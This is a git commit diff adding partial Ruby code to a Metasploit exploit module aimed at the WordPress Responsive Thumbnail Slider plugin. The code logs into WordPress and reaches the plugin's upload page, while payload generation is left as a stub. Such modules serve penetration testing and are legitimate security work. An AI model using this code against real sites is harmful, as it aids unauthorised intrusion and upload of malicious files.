authenticating to WordPress
Shelby Pace
parent
668bcb38cb
commit
8f89275df8
|
|
@ -45,12 +45,69 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
|
# check for WordPress
|
||||||
|
# check if plugin is installed
|
||||||
end
|
end
|
||||||
|
|
||||||
# log into Wordpress
|
# log into Wordpress
|
||||||
# access 'manage images' page
|
# access 'manage images' page
|
||||||
# upload file
|
# upload file
|
||||||
def exploit
|
def login
|
||||||
|
wp_uri = normalize_uri(target_uri.path, 'wp-login.php')
|
||||||
|
res = send_request_cgi(
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => wp_uri
|
||||||
|
)
|
||||||
|
|
||||||
|
if res && res.body.include?("WordPress") && res.body.include?("200")
|
||||||
|
print_status("WordPress accessed")
|
||||||
|
else
|
||||||
|
fail_with(Failure::NotFound, "Failed to access WordPress Login Page")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
redirect_uri = normalize_uri(target_uri.path, 'wp-admin/')
|
||||||
|
cookies = res.get_cookies
|
||||||
|
wp_login_res = send_request_cgi(
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => wp_uri,
|
||||||
|
'cookie' => cookies,
|
||||||
|
'vars_post' => {
|
||||||
|
'log' => datastore['USERNAME'],
|
||||||
|
'pwd' => datastore['PASSWORD'],
|
||||||
|
'wp-submit' => 'Log In',
|
||||||
|
'redirect_to' => redirect_uri
|
||||||
|
}
|
||||||
|
)
|
||||||
|
|
||||||
|
auth_cookies = wp_login_res.get_cookies
|
||||||
|
auth_res = send_request_cgi(
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => redirect_uri,
|
||||||
|
'cookie' => auth_cookies
|
||||||
|
)
|
||||||
|
|
||||||
|
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar")
|
||||||
|
|
||||||
|
print_good("Logged into WordPress")
|
||||||
|
upload_payload(auth_cookies)
|
||||||
|
end
|
||||||
|
|
||||||
|
def upload_payload(cookies)
|
||||||
|
# attempt to access plugins page
|
||||||
|
plugin_res = send_request_cgi(
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'),
|
||||||
|
'cookie' => cookies
|
||||||
|
)
|
||||||
|
|
||||||
|
unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
|
||||||
|
fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Plugin Page")
|
||||||
|
end
|
||||||
|
|
||||||
|
# generate payload
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
login
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue